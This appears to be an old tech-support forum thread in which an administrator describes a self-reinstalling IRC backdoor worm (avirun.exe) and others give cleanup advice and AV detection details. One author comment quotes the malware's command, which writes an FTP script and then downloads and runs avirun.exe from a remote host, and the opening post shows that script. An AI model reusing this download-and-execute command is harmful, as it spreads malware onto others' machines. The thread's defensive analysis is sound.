unknown virus / backdoor trojan for IRC

Posted on 2004-11-04
Last Modified: 2013-12-04
i have discovered a viurs/backdoor trojan which i cannot find a resolution for.  i have pieces of the virus, but not the entire puzzle to clean the infected machines.  i have searched google, symantec, etc. for the process name (avirun.exe) but it was prob mutated.  here is what i have:

on windows 2000 and XP boxes i found a process that runs called avirun.exe. when it runs it makes the computer unable to accept connections mainly because the virus is opening the box to an IRC channel.  i have to reboot inorder to delete the avirun.exe, but first i have to delete all the "MSConfig" = "avirun.exe" out of the registry keys (and there are quit a few).  however, this prcoess comes back. i then found a file, named simply as "o" which is displayed below.  it looks as if this file FTP's the avirun.exe from another infected machine.  even if i delete all the entries, the avirun.exe and the o file, it still comes back.  making me think that it spreads via a Windows exploit.  i could not find any file (i checked recently mofied files) that is a batch that would call the o file to download the .exe or any other executables in the regedit Run's.  it looks like the Backdoor.Hacarmy.E trojan, except that it keeps coming back.

has anyone seen this? if so, is there a removal tool.  i think if you fully patch the OS and delete all parts, it will stay away, but i need to be able to get rid of it on unpatched systems to stop the spread.

FYI, a full symantec scan via the Internet or newest def's come up clean.

o file:

open [ip address] [port]
user 1 1
get avirun.exe
Question by:xxgenius
    LVL 17

    Expert Comment

    Hi xxgenius,

    It sounds very interesting. The behaviour is that of a trojan. First thing I'd do is to download ProcessExplorer and run it. Look for the avirun and the o processes. in ProcessExplorer, souble-clicking on a process will bring up a wealth of info, including Registry keys and the IP number to which the process is connecting. If you have a Firewall, you can create a rule to block access to hat IP and then use KillBox to kill the offending files, but specially the o file, which is the monitor/downloader. Then you can use the info gathered from ProcessExplorer to clean up your Registry.

    You can download ProcessExplorer and KillBox from:

    By the way, before deleting these files I'd make a Zip file with them and send it to the guys at McAffee and Symantec for research.

    Good Vibes!

    LVL 8

    Author Comment

    These have been sent to Symantec and Sybari (which then dipurses them to other engines).  According to Symantec, their latest Rapid Response would catch it (haven't tried it yet).  I can say that your Windows must be patched and then you can delete the files.  Here is what the avirun.exe does when executed:

    echo open [IPaddress Port] > o&echo user 1 1 >> o &echo get avirun.exe >> o &echo quit >> o &ftp -n -s:o &avirun.exe
    LVL 8

    Author Comment

    symantec definitions 11/5/04 Rev 5 will detect it as W32.Spybot.worm.  

    To rid your machine: fully patch with windows and reboot.  then run antiv and delete files it finds.  delete the "o" file. open regedit, search for all strings for the process and delete.
    LVL 1

    Accepted Solution

    PAQd, 250 points refunded - asker posted solution

    Community Support Moderator
    LVL 17

    Expert Comment


    Featured Post

    Free Trending Threat Insights Every Day

    Enhance your security with threat intelligence from the web. Get trending threat insights on hackers, exploits, and suspicious IP addresses delivered to your inbox with our free Cyber Daily.

    Join & Write a Comment

    As I write this article, I am finishing cleanup from the Qakbot virus variant found in the wild on April 18, 2011.  It was a messy beast that had varying levels of infection, speculated as being dependent on how long it resided on the infected syste…
    Recently, I read that Microsoft has analysed statistics for their security intelligence report. It revealed: still, the clear majority of windows users do their daily work as administrator. An administrative account is a burden, security-wise. My ar…
    how to add IIS SMTP to handle application/Scanner relays into office 365.
    This video gives you a great overview about bandwidth monitoring with SNMP and WMI with our network monitoring solution PRTG Network Monitor ( If you're looking for how to monitor bandwidth using netflow or packet s…

    732 members asked questions and received personalized solutions in the past 7 days.

    Join the community of 500,000 technology professionals and ask your questions.

    Join & Ask a Question

    Need Help in Real-Time?

    Connect with top rated Experts

    24 Experts available now in Live!

    Get 1:1 Help Now